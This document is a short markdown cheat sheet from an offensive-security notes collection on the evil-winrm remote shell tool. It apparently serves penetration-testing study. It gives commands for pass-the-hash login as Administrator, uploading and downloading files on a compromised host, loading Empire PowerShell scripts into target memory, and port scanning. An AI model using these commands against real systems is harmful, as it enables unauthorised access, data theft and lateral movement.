killchain-compendium/Reverse Shells/evil-winrm.md

34 lines
838 B
Markdown
Raw Normal View History

2022-11-13 16:00:22 +01:00
# evil-winrm
* Password or NTLM Hash as authenticator
```sh
evil-winrm -u Administrator -H <Hash> -i IP
evil-winrm -u Administrator -p <Password> -i IP -P <Port>
```
## Upload & Download
* On opened host
```sh
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>
```
## Load Powershell Scripts into Target Memory
* Load attacker scripts into target's memory
```sh
evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>
```
* As an example, load Empire scripts dir for port scanning
```sh
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```
* Init `Invoke-Portscan.ps1`
* `Get-Help Invoke-Portscan`
```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```